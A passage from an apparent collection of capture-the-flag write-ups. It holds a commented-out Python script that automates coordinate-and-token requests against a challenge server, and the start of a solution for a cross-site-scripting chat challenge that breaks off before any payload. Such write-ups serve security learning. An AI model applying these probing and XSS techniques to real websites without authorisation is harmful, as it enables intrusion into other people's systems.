51 | # last_lat = lat
52 | # last_lon = lon
53 |
54 | # session = HTMLSession()
55 | # while True:
56 | # query = {'lat': str(lat), 'lon': str(lon), 'token': token}
57 | # print({'lat': lat, 'lon': lon})
58 | # r = session.get(url, params=query)
59 | # response_url = urlparse(r.url)
60 | # response_query = parse_qs(response_url.query)
61 | # token = response_query['token'][0]
62 |
63 | # try:
64 | # response_text = r.html.find('p')[1].text
65 | # print(response_text)
66 | # print(token)
67 |
68 | # if response_text.startswith('You tried to travel'):
69 | # failcount += 1
70 | # if failcount > 2:
71 | # failcount = 0
72 | # state = (state + 1) % len(states)
73 |
74 | # lat = last_lat
75 | # lon = last_lon
76 | # else:
77 | # failcount = 0
78 | # last_lat = lat
79 | # last_lon = lon
80 |
81 | # if states[state] == 0:
82 | # lon -= inc
83 | # else:
84 | # lat -= inc
85 | # except:
86 | # print('Error. {}'.format(r.html.text))
87 | # print("url: {}".format(r.url))
88 |
89 | # time.sleep(1)
90 |
91 |
92 | # states = [2]
93 | # state = 0
94 | # inc = 0.0005
95 |
96 | # last_lat = lat
97 | # last_lon = lon
98 | # failcount = 0
99 |
100 | # while True:
101 | # query = {'lat': str(lat), 'lon': str(lon), 'token': token}
102 | # print({'lat': lat, 'lon': lon})
103 | # r = session.get(url, params=query)
104 | # response_url = urlparse(r.url)
105 | # response_query = parse_qs(response_url.query)
106 | # token = response_query['token'][0]
107 |
108 | # try:
109 | # response_text = r.html.find('p')[1].text
110 | # print(response_text)
111 | # print(token)
112 |
113 | # if response_text.startswith('You tried to travel'):
114 | # failcount += 1
115 | # if (failcount > 2):
116 | # failcount = 0
117 | # # inc /= 10
118 |
119 | # state = (state + 1) % len(states)
120 | # lat = last_lat
121 | # lon = last_lon
122 | # else:
123 | # failcount = 0
124 | # inc = 0.001
125 | # last_lat = lat
126 | # last_lon = lon
127 |
128 | # if states[state] == 1:
129 | # lat -= inc
130 | # elif states[state] == 2:
131 | # lon -= inc
132 | # elif states[state] == 0:
133 | # lat -= inc
134 | # lon -= inc
135 | # except:
136 | # print('Error. {}'.format(r.html.text))
137 | # print("url: {}".format(r.url))
138 |
139 | # input()
--------------------------------------------------------------------------------
/09-web-cwo-xss/README.md:
--------------------------------------------------------------------------------
1 | # Description
2 | ## Cookie World Order
3 | Label: web
4 |
5 | Good job! You found a further credential that looks like a VPN referred to as the cWo. The organization appears very clandestine and mysterious and reminds you of the secret ruling class of hard shelled turtle-like creatures of Xenon. Funny they trust their security to a contractor outside their systems, especially one with such bad habits. Upon further snooping you find a video feed of those "Cauliflowers" which look to be the dominant lifeforms and members of the cWo. Go forth and attain greater access to reach this creature!
6 |
7 | # Solution
8 | This task gives us a link [https://cwo-xss.web.ctfcompetition.com/](https://cwo-xss.web.ctfcompetition.com/). The website contains a video and a chat window on the right side. It appears that we are chatting with an admin and so it probably requires another xss. However, entering a tag like `